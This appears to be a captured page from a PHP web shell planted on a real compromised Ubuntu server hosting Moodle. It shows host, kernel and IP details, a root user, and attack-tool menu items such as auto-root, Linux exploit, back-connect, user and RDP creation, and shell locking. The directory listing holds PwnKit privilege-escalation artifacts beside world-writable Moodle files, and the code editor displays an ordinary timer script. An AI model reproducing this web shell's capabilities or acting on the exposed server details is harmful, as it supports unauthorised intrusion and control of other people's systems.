Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
mod /
lesson /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pagetypes
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
continue.php
9.51
KB
-rwxrwxrwx
edit.php
2.72
KB
-rwxrwxrwx
editpage.php
5.18
KB
-rwxrwxrwx
editpage_form.php
1.97
KB
-rwxrwxrwx
essay.php
17.09
KB
-rwxrwxrwx
essay_form.php
2.25
KB
-rwxrwxrwx
format.php
25.9
KB
-rwxrwxrwx
grade.php
1.6
KB
-rwxrwxrwx
highscores.php
9.3
KB
-rwxrwxrwx
import.php
3.72
KB
-rwxrwxrwx
import_form.php
3.11
KB
-rwxrwxrwx
index.php
3.97
KB
-rwxrwxrwx
lesson.php
6.4
KB
-rwxrwxrwx
lib.php
31.62
KB
-rwxrwxrwx
locallib.php
100.95
KB
-rwxrwxrwx
mediafile.php
4.22
KB
-rwxrwxrwx
mod_form.php
15.39
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
reformat.php
6.62
KB
-rwxrwxrwx
renderer.php
23.9
KB
-rwxrwxrwx
report.php
26.92
KB
-rwxrwxrwx
settings.php
3.18
KB
-rwxrwxrwx
styles.css
1.95
KB
-rwxrwxrwx
tabs.php
3.66
KB
-rwxrwxrwx
timer.js
3.92
KB
-rwxrwxrwx
version.php
1.18
KB
-rwxrwxrwx
view.php
27.44
KB
-rwxrwxrwx
view_form.php
1.97
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : timer.js
/*///////////////////////////////////////////////////////// // This code is based off of // "Live Clock Lite" script - Version 1.0 // By Mark Plachetta (astroboy@zip.com.au) // // The original script displayed a clock. // Mark Nielsen modified it to be a countdown timer // for the lesson module in moodle. // // Below is the code that is used to call this page. // echo "<script type=\"text/javascript\">\n"; // echo "var starttime = ". $timer->starttime . ";\n"; // echo "var servertime = ". time() . ";\n"; // echo "var testlength = ". $lesson->maxtime * 60 .";\n"; // echo "document.write('<script type=\"text/javascript\" src=\"liveclock_lite.js\"><\/script>');\n"; // echo "window.onload = function () { show_clock(); }"; // echo "</script>\n"; // //////////////////////////////////////////////////////////*/ var myfont_face = "Arial"; var myfont_size = "12"; var myfont_color = "#000000"; var myback_color = "#FFFFFF"; var mywidth = 80; var my12_hour = 1; var stopclock = 0; var myclock = ''; var timeleft, hours, minutes, secs; var javatimeDate = new Date(); var javatime = javatimeDate.getTime(); javatime = Math.floor(javatime/1000); if (typeof(clocksettings)!='undefined') { if (clocksettings.starttime) { starttime = parseInt(clocksettings.starttime); } if (clocksettings.servertime) { servertime = parseInt(clocksettings.servertime); } if (clocksettings.testlength) { testlength = parseInt(clocksettings.testlength); } } difference = javatime - servertime; starttime = starttime + difference; var dn = ""; var old = ""; if (document.all||document.getElementById) { document.write('<span id="LiveClockIE" style="width:'+mywidth+'px;"></span>'); } else if (document.layers) { document.write('<ilayer id="ClockPosNS"><layer width="'+mywidth+'" id="LiveClockNS"></layer></ilayer>'); } else { old = "true"; show_clock(); } /*function leave() { // feable attempt to run a script when someone leaves a timed test early, failed so far window.onunload = window.open('http://www.google.com','','toolbar=no,menubar=no,location=no,height=500,width=500'); } leave();*/ function show_clock() { //show clock in NS 4 if (document.layers) document.ClockPosNS.visibility="show"; if (old == "die") { return; } currentDate = new Date(); current = currentDate.getTime(); current = Math.floor(current/1000); var myclock = '<font style="color:'+myfont_color+'; font-family:'+myfont_face+'; font-size:'+myfont_size+'pt;">'; if (current > starttime + testlength) { myclock += "Time is up"; stopclock = 1; } else { timeleft = starttime + testlength - current; hours = Math.floor(timeleft/3600); timeleft = timeleft - (hours * 3600); minutes = Math.floor(timeleft/60); secs = timeleft - (minutes * 60); if (secs < 10) { secs = "0"+secs; } if (minutes < 10) { minutes = "0"+minutes; } myclock += hours+":"+minutes+":"+secs; } myclock += '</font>'; if (old == "true") { document.write(myclock); old = "die"; return; } if (document.layers) { clockpos = document.ClockPosNS; liveclock = clockpos.document.LiveClockNS; liveclock.document.write(myclock); liveclock.document.close(); } else if (document.all) { LiveClockIE.innerHTML = myclock; } else if (document.getElementById) { document.getElementById("LiveClockIE").innerHTML = myclock; } if (stopclock == 0) { setTimeout("show_clock()",1000); } }
Close